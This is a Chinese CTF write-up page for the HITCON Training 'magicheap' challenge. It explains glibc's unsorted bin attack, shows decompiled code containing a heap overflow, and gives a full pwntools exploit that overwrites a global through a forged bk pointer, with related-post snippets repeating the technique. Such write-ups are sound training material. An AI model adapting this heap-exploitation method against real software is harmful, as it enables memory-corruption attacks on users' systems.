HITCON Training lab14——magic heap

最新推荐文章于 2022-09-16 14:28:18 发布
最新推荐文章于 2022-09-16 14:28:18 发布
阅读量431 收藏
点赞数
文章标签: 数据结构与算法
原文链接:http://www.cnblogs.com/pfcode/p/10735565.html
版权

64位程序,没开PIE  #Unsorted Bin Attack

 先回顾一下 Unsorted Bin 的基本来源以及基本使用情况。

基本来源

  1. 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。
  2. 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。关于 top chunk 的解释,请参考下面的介绍。
  3. 当进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。

基本使用情况 

  1. Unsorted Bin 在使用的过程中,采用的遍历顺序是 FIFO,即插入的时候插入到 unsorted bin 的头部,取出的时候从链表尾获取。
  2. 在程序 malloc 时,如果在 fastbin,small bin 中找不到对应大小的 chunk,就会尝试从 Unsorted Bin 中寻找 chunk。如果取出来的 chunk 大小刚好满足,就会直接返回给用户,否则就会把这些 chunk 分别插入到对应的 bin 中。

unsorted bin 中最后一个chunk的fd bk 均指向unsorted bin本身

将unsorted bin 中最后一个chunk的bk改为target_adr-0x10

在将最后一个chunk拿出来的过程中即可将target_adr处内容改为unsorted bin链表头部地址,为一个很大的数

这看起来似乎并没有什么用处,但是其实还是有点卵用的,比如说

  • 我们通过修改循环的次数来使得程序可以执行多次循环。
  • 我们可以修改 heap 中的 global_max_fast 来使得更大的 chunk 可以被视为 fast bin,这样我们就可以去执行一些 fast bin attack 了。

程序逻辑

 1 int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
 2 {
 3   char *v3; // rsi
 4   const char *v4; // rdi
 5   int v5; // eax
 6   char buf; // [rsp+0h] [rbp-10h]
 7   unsigned __int64 v7; // [rsp+8h] [rbp-8h]
 8 
 9   v7 = __readfsqword(0x28u);
10   setvbuf(stdout, 0LL, 2, 0LL);
11   v3 = 0LL;
12   v4 = (const char *)stdin;
13   setvbuf(stdin, 0LL, 2, 0LL);
14   while ( 1 )
15   {
16     while ( 1 )
17     {
18       menu(v4, v3);
19       v3 = &buf;
20       read(0, &buf, 8uLL);
21       v4 = &buf;
22       v5 = atoi(&buf);
23       if ( v5 != 3 )
24         break;
25       delete_heap(&buf, &buf);
26     }
27     if ( v5 > 3 )
28     {
29       if ( v5 == 4 )
30         exit(0);
31       if ( v5 == 4869 )
32       {
33         if ( (unsigned __int64)magic <= 0x1305 )
34         {
35           v4 = "So sad !";
36           puts("So sad !");
37         }
38         else
39         {
40           v4 = "Congrt !";
41           puts("Congrt !");
42           l33t("Congrt !", &buf);
43         }
44       }
45       else
46       {
47 LABEL_17:
48         v4 = "Invalid Choice";
49         puts("Invalid Choice");
50       }
51     }
52     else if ( v5 == 1 )
53     {
54       create_heap(&buf, &buf);
55     }
56     else
57     {
58       if ( v5 != 2 )
59         goto LABEL_17;
60       edit_heap(&buf, &buf);
61     }
62   }
63 }

编辑堆模块

 1 unsigned __int64 edit_heap()
 2 {
 3   __int64 v0; // ST08_8
 4   int v2; // [rsp+4h] [rbp-1Ch]
 5   char buf; // [rsp+10h] [rbp-10h]
 6   unsigned __int64 v4; // [rsp+18h] [rbp-8h]
 7 
 8   v4 = __readfsqword(0x28u);
 9   printf("Index :");
10   read(0, &buf, 4uLL);
11   v2 = atoi(&buf);
12   if ( v2 < 0 || v2 > 9 )
13   {
14     puts("Out of bound!");
15     _exit(0);
16   }
17   if ( heaparray[v2] )
18   {
19     printf("Size of Heap : ", &buf);     //堆溢出
20     read(0, &buf, 8uLL);
21     v0 = atoi(&buf);
22     printf("Content of heap : ", &buf);
23     read_input(heaparray[v2], v0);
24     puts("Done !");
25   }
26   else
27   {
28     puts("No such heap !");
29   }
30   return __readfsqword(0x28u) ^ v4;
31 }

同时,我们看到,当我们控制 v3 为 4869,同时控制 magic 大于 4869,就可以得到 flag 了

利用思路

 

  1. 释放一个堆块到 unsorted bin 中。
  2. 利用堆溢出漏洞修改 unsorted bin 中对应堆块的 bk 指针为 &magic-16。
  3. 触发漏洞即可。

expolit

 

 1 from pwn import *
 2 
 3 r = process('./magicheap')
 4 
 5 
 6 def create_heap(size, content):
 7     r.recvuntil(":")
 8     r.sendline("1")
 9     r.recvuntil(":")
10     r.sendline(str(size))
11     r.recvuntil(":")
12     r.sendline(content)
13 
14 
15 def edit_heap(idx, size, content):
16     r.recvuntil(":")
17     r.sendline("2")
18     r.recvuntil(":")
19     r.sendline(str(idx))
20     r.recvuntil(":")
21     r.sendline(str(size))
22     r.recvuntil(":")
23     r.sendline(content)
24 
25 
26 def del_heap(idx):
27     r.recvuntil(":")
28     r.sendline("3")
29     r.recvuntil(":")
30     r.sendline(str(idx))
31 
32 
33 create_heap(0x20, "dada")  # 0
34 create_heap(0x80, "dada")  # 1
35 # in order not to merge into top chunk
36 create_heap(0x20, "dada")  # 2
37 
38 del_heap(1)
39 
40 magic = 0x6020c0
41 fd = 0
42 bk = magic - 0x10
43 
44 edit_heap(0, 0x20 + 0x20, "a" * 0x20 + p64(0) + p64(0x91) + p64(fd) + p64(bk))
45 create_heap(0x80, "dada")  #trigger unsorted bin attack
46 r.recvuntil(":")
47 r.sendline("4869")
48 r.interactive()

 

转载于:https://www.cnblogs.com/pfcode/p/10735565.html

aaa15893831716
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HITCON Training lab14 magic heap
weixin_50287973的博客
11-06 248
咕了有段时间了,再咕一阵子吧(错乱 这是个典型的unsorted bin attack edit函数可以自己输入更大的size,并修改堆块 控制choice为4869,magic>4869即可get flag 思路: 1.free chunk ->unsorted bin 2.利用edit函数构造堆块内容,修改链入unsorted bin的freechunk的bk指针为&magic-16 3.malloc chunk -> 触发unsorted bin attack EX
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
hitcontraining magicheap
pondzhang的专栏
06-16 354
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1132
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序,开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
BUUCTF【hitcontraining_magicheap
weixin_51055545的博客
02-13 1669
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
hitcontraining_lab14学习(以及Unsorted Bin的个人理解
a2590035252的博客
09-16 1496
适合和我一样的菜鸡pwner
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
hitcon2015:Microsoft Edge MemGC内部
05-12
2014年,Microsoft推出了两个新的漏洞利用缓解措施,称为“隔离堆”和“ MemoryProtection”。 这些缓解措施大大增加了释放后使用(UAF)漏洞利用的难度,但是当指向释放块的指针没有保留在堆栈上时,仍有许多方法...
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
heap_exploit_2.31
03-21
堆攻击2.31 glibc 2.31版中有关ptmalloc的堆利用。...其他堆利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
hitcontraining_magicheap buuctf
m0_57754423的博客
02-12 1251
这题的漏洞点在编辑heap: 可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。 我自己的思路是: 利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。 exp: from pwn import * p = remote("node4.buuoj.cn",25162) #p = process("./magicheap") e = ELF("./magicheap") sh_addr = 0x400c50 bss_addr
hitcontraining_magicheap
z1r0的博客
12-23 253
hitcontraining_magicheap 查看保护 magic <= 0x1305即可getshell。 edit的时候没有注意size,可以堆溢出,没有pie直接unstoredbin attack。具体的attack看我的blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remo
【unstored bin attack】hitcontraining_magicheap
huzai9527的博客
04-14 141
【unstored bin attack】 1.ida分析 2.思路 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数 3.exp from pwn import * p = remote('node3.buuoj.cn',25879) #p = process('./magicheap') context.log_level = 'debug' def add(size,cont): p.sendlin
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 332
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
magicheap
m0_48127441的博客
04-24 124
1 create 2 edit //存在溢出 3 del 4 exit 4869 只要0x6020A0 大于0x1305 执行后门 所以目标是修改该值 利用unsort_bin attack 弹出链表一项时需要进行 front now next front -> next = next next-> front = front 即 unsort_bins[0] --> bk = unsort_bins[0] --> bk -...
hitcon lab1-lab14
Maxmalloc的博客
12-23 1069
lab 1 ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=0840aeca8337fc97ba1134067d05ee2563b3f4ce, not st...
MagicHeap-WP
qq_41252520的博客
08-05 253
保护 分析 主要漏洞在编辑函数中,对输入大小没有检验,导致堆溢出 unsigned __int64 edit_heap() { __int64 v0; // ST08_8 int v2; // [rsp+4h] [rbp-1Ch] char buf; // [rsp+10h] [rbp-10h] unsigned __int64 v4; // [rsp...
hitcontraining_heapcreator
m0sway的博客
01-07 2867
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值